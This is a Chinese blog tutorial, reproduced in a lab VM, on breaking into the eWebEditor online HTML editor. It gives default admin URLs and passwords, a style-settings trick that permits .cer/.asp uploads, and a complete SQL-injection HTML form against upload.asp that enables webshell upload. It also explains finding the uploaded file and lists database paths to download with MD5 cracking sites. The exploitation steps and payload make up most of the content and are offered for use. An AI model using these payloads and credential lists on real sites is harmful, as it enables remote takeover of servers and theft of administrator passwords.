Ewebeditor编辑器漏洞

1、Ewebeditor编辑器介绍

Ewebeditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件（如：Word）所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框替换为可视化的富文本输入框，使最终用户可以可视化的发布HTML格式的网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具！</p> <p>2、eWebEditor编辑器搭建过程：</p> <blockquote> <p>VM的Windows2003      eWebEditor_v216_Free   </p> </blockquote> <p>打开IIS，新建网站：</p> <p>设置网站本地ip地址及端口：</p> <pre class="brush:python;toolbar:false">IP地址 10.0.0.101 端口 92</pre> <p>  主目录路径：</p> <pre class="brush:python;toolbar:false">C:\wwwtest\1111\wwwwtest\eWebEditor</pre> <p> 设置权限：</p> <p>搭建完成。</p> <hr /> <p>3、Ewebeditor利用核心</p> <p >默认后台：www.xxxx.com/ewebeditor/admin_login.asp</p> <p >默认数据库：ewebeditor/db/ewebeditor.mdb</p> <p >默认账号密码：admin admin/admin888</p> <p>4、利用过程</p> <p >通常入侵ewebeditor编辑器的步骤如下:</p> <p >1、首先访问默认管理页看是否存在</p> <p >       默认管理页地址2.80以前为 ewebeditor/admin_login.asp</p> <p > 以后版本为admin/login.asp(其他语言改后戳,这里以asp为例) 。</p> <p>打开后台：</p> <pre class="brush:python;toolbar:false">http://10.0.0.101:92/Admin_Login.asp</pre> <p >2、默认管理帐号密码</p> <p >默认帐号密码为: admin admin888 ！常用的密码还有admin admin999 admin1 admin000 之类的。</p> <p>样式管理--新建样式：</p> <p>设置名称及添加照片类型：</p> <p>（通过改照片类型方式上传文件绕过）</p> <pre class="brush:python;toolbar:false">asp|cer|sas|aaspsp ## 因这几种类型默认可以被解析</pre> <p>新建样式--工具栏--按钮设置--添加【插入或修改照片】按钮--保存设置</p> <p>预览新建的样式：</p> <p>功能不能用，阅览器版本过高问题，切换到低版本正常使用：</p> <p> 使用低版本阅览器打开新建的样式，预览，点图标上传：</p> <pre class="brush:python;toolbar:false">上传文件：123.cer</pre> <p >点击确定，webshell木马上传成功，之后，查看代码，就能看到完整的地址。</p> <p>阅览器访问上传的文件,webshell木马被执行：</p> <p>可以远程操控目标主机了。</p> <hr /> <p>可以在在线平台查询eWebEditor相关漏洞及详细信息：</p> <p>如：eWebEditor 2.1.6 /upload.asp 文件上传漏洞</p> <p>查找漏洞相关信息：</p> <p>新建html文件，将代码粘贴到html文件中保存：</p> <pre class="brush:python;toolbar:false"><form action="http://10.0.0.101:92/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=100><br><br> <input type=submit value=Fuck> </form> //将127.1/替换网站地址10.0.0.101:92</pre> <p>打开html文件进行上传 ：</p> <p>上传成功之后，右击页面查看源代码：</p> <p>找到上传后重命名文件名：</p> <p>（发现没有文件路径只有重命名后的文件名，访问文件思路：1、根据报错法2、抓包工具相应包里查看（大部分没有）3、如果网站是开源的，下载源代码在本地虚拟机搭建相同环境复现漏洞，在虚拟机查找文件保存的目录。</p> <pre class="brush:python;toolbar:false">2024512195912425.cer</pre> <p>根据虚拟机搭建的网站查找文件名找到文件存放路径：</p> <pre class="brush:python;toolbar:false">C:\wwwtest\1111\wwwwtest\eWebEditor\UploadFile ##C:\wwwtest\1111\wwwwtest\eWebEditor为网站根目录 ##UploadFile文件存放目录 即http://10.0.0.101:92/UploadFile/2024512195912425.cer</pre> <p>webshell木马执行成功。</p> <hr /> <p >3、默认数据库地址</p> <p >如果密码不是默认的,我们访问的就不是默认数据库。尝试下载数据库得到管理员密码！管理员的帐号密码，都在eWebEditor_System表段里，sys_UserName Sys_UserPass 都是md5加密的。得到了加密密码。可以去www.cmd5.com www.xmd5.org 等网站进行查询</p> <pre class="brush:python;toolbar:false">默认数据库路径为: ewebeditor/db/ewebeditor.mdb  常用数据库路径为: ewebeditor/db/ewebeditor.asa  ewebeditor/db/ewebeditor.asp ewebeditor/db/#ewebeditor.asa  ewebeditor/db/#ewebeditor.mdb ewebeditor/db/ewebeditor.mdb ewebeditor/db/!@#ewebeditor.asp  ewebeditor/db/ewebeditor1033.mdb ......等等。</pre> <hr /> </div> </div> <div class="post-statement"> <p>转载请注明来自<a href="http://mnshijie.com/" title="码农世界"><strong>码农世界</strong></a>，本文标题：<a href="http://mnshijie.com/post/30643.html" title="任意文件上传与Ewebeditor、fckeditor、CKFinder、southidceditor等编辑器漏洞（四）">《任意文件上传与Ewebeditor、fckeditor、CKFinder、southidceditor等编辑器漏洞（四）》</a></p> </div> <div class="post-share"> 百度分享代码，如果开启HTTPS请参考李洋个人博客 </div> <div id="authorarea"> <div class="authorinfo"> <div class="author-avater"><img alt="" src="http://mnshijie.com/zb_users/avatar/0.png" class="avatar avatar-50 photo" height="50" width="50"></div> <div class="author-des"> <div class="author-meta"> <span class="post-author-name"><a href="http://mnshijie.com/author-1.html" title="由码农世界发布" rel="author">码农世界</a></span> <span class="post-author-tatus"><a href="http://mnshijie.com/author-1.html" target="_blank">37815篇文章</a></span> <span class="post-author-url"><a href="http://mnshijie.com/" rel="nofollow" target="_blank">站点</a></span> <span class="post-author-weibo"><a href="" rel="nofollow" target="_blank">微博</a></span> </div> <div class="author-description">每一天，每一秒，你所做的决定都会改变你的人生！</div> </div> </div> </div> </div> <div id="related"> <div class="related-title">阅读最新文章</div> <ul class="related_img"> <li><a href="http://mnshijie.com/post/37889.html" title="详细阅读 Visual Studio 连接 MySQL 数据库 实现数据库的读写（C++）" target="_blank"><img src="http://mnshijie.com/zb_users/theme/viewlee/style/noimg/8.jpg" alt="Visual Studio 连接 MySQL 数据库 实现数据库的读写（C++）" class="thumbnail"><h2>Visual Studio 连接 MySQL 数据库 实现数据库的读写（C++）</h2></a></li> <li><a href="http://mnshijie.com/post/37888.html" title="详细阅读 [工业自动化-1]：PLC架构与工作原理" target="_blank"><img src="https://img-blog.csdnimg.cn/ce10a1471ed14382bc58364cf8bd5209.png" alt="[工业自动化-1]：PLC架构与工作原理" class="thumbnail"><h2>[工业自动化-1]：PLC架构与工作原理</h2></a></li> <li><a href="http://mnshijie.com/post/37887.html" title="详细阅读 网络编程（六）TCP并发服务器" target="_blank"><img src="http://mnshijie.com/zb_users/theme/viewlee/style/noimg/6.jpg" alt="网络编程（六）TCP并发服务器" class="thumbnail"><h2>网络编程（六）TCP并发服务器</h2></a></li> <li><a href="http://mnshijie.com/post/37886.html" title="详细阅读 Vue3、Element Plus使用v-for循环el-form表单进行校验" target="_blank"><img src="https://img-blog.csdnimg.cn/direct/34ca8f49a9834f19aa1f2386f3777de3.png" alt="Vue3、Element Plus使用v-for循环el-form表单进行校验" class="thumbnail"><h2>Vue3、Element Plus使用v-for循环el-form表单进行校验</h2></a></li> <li><a href="http://mnshijie.com/post/37885.html" title="详细阅读 Ceph: vdbench 测试ceph存储rbd块设备" target="_blank"><img src="https://img-blog.csdnimg.cn/direct/77c62498365d4c81ae16700a08435706.jpeg" alt="Ceph: vdbench 测试ceph存储rbd块设备" class="thumbnail"><h2>Ceph: vdbench 测试ceph存储rbd块设备</h2></a></li> <li><a href="http://mnshijie.com/post/37884.html" title="详细阅读 linux如何部署前端项目和安装nginx" target="_blank"><img src="https://img-blog.csdnimg.cn/direct/0a2ab1658eac426c88c651326cc1fb77.jpeg" alt="linux如何部署前端项目和安装nginx" class="thumbnail"><h2>linux如何部署前端项目和安装nginx</h2></a></li> <li><a href="http://mnshijie.com/post/37883.html" title="详细阅读 Windows OpenVPN的安装之服务器自动启动连接" target="_blank"><img src="http://mnshijie.com/zb_users/theme/viewlee/style/noimg/1.jpg" alt="Windows OpenVPN的安装之服务器自动启动连接" class="thumbnail"><h2>Windows OpenVPN的安装之服务器自动启动连接</h2></a></li> <li><a href="http://mnshijie.com/post/37882.html" title="详细阅读 服务器数据恢复—KVM虚拟机被误删除如何恢复虚拟磁盘文件？" target="_blank"><img src="https://img-blog.csdnimg.cn/direct/f6ab95f8ca66474c9f65036b6513a849.jpeg" alt="服务器数据恢复—KVM虚拟机被误删除如何恢复虚拟磁盘文件？" class="thumbnail"><h2>服务器数据恢复—KVM虚拟机被误删除如何恢复虚拟磁盘文件？</h2></a></li> </ul> </div><div id="comments" class="clearfix"> <!--评论框--> <div id="comt-respond" class="commentpost"> <h4><i class="fa fa-pencil"></i>发表评论<span><a rel="nofollow" id="cancel-reply" href="#comment" style="display:none;"><small>取消回复</small></a></span></h4> <form id="frmSumbit" target="_self" method="post" action="http://mnshijie.com/zb_system/cmd.php?act=cmt&postid=30643&key=4a580c011cfbdc7e7ba940561e570065" > <input type="hidden" name="inpId" id="inpId" value="30643" /> <input type="hidden" name="inpRevID" id="inpRevID" value="0" /> <div class="comt-box"> <div class="form-group liuyan form-name"><input type="text" id="inpName" name="inpName" class="text" value="" placeholder="昵称" size="28" tabindex="1" /></div> <div class="form-group liuyan form-email"><input type="text" id="inpEmail" name="inpEmail" class="text" value="" placeholder="邮箱" size="28" tabindex="2" /></div> <div class="form-group liuyan form-www"><input type="text" id="inpHomePage" name="inpHomePage" class="text" value="" placeholder="网址" size="28" tabindex="3" /></div></div> <div id="comment-tools"><!--verify--> <div class="tools_title"> <span class="com-title">快捷回复：</span> <a title="粗体字" onmousedown="InsertText(objActive,ReplaceText(objActive,'[B]','[/B]'),true);"><i class="fa fa-bold"></i></a> <a title="斜体字" onmousedown="InsertText(objActive,ReplaceText(objActive,'[I]','[/I]'),true);"><i class="fa fa-italic"></i></a> <a title="下划线" onmousedown="InsertText(objActive,ReplaceText(objActive,'[U]','[/U]'),true);"><i class="fa fa-underline"></i></a> <a title="删除线" onmousedown="InsertText(objActive,ReplaceText(objActive,'[S]','[/S]'),true);"><i class="fa fa-strikethrough"></i></a> <a href="javascript:addNumber('文章不错,写的很好！')" title="文章不错,写的很好！"><i class="fa fa-thumbs-o-up"></i></a> <a href="javascript:addNumber('emmmmm。。看不懂怎么破？')" title="emmmmm。。看不懂怎么破？"><i class="fa fa-thumbs-o-down"></i></a> <a href="javascript:addNumber('赞、狂赞、超赞、不得不赞、史上最赞！')" title="赞、狂赞、超赞、不得不赞、史上最赞！"><i class="fa fa-heart"></i></a> </div> <div class="tools_text"> <textarea placeholder="请遵守相关法律与法规，文明评论。O(∩_∩)O~~" name="txaArticle" id="txaArticle" class="text input-block-level comt-area" cols="50" rows="4" tabindex="5">